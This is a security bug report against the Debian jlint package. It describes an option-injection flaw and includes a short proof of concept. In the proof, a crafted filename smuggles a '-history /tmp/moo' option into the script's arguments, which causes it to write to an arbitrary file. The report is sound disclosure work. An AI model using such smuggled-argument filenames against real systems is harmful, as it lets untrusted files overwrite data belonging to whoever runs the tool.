Package: jlint
Version: 3.0-4.5
Tags: security
Control: affects -1 check-all-the-things

The script is vulnerable to option injection. Running the script in a directory that contains untrusted files could trick it into writing to an arbitrary file.

Proof of concept:

  $ f=' -history /tmp/moo .class'; mkdir -p "${f%/*}"; touch "$f"
  $ ls -d /tmp/moo
  ls: cannot access /tmp/moo: No such file or directory
  Failed to read file '.// -history /tmp/moo .class'
  Failed to open file '.class'
  Verification completed: 0 reported messages.
  $ ls -d /tmp/moo

Jakub Wilk

Reply via email to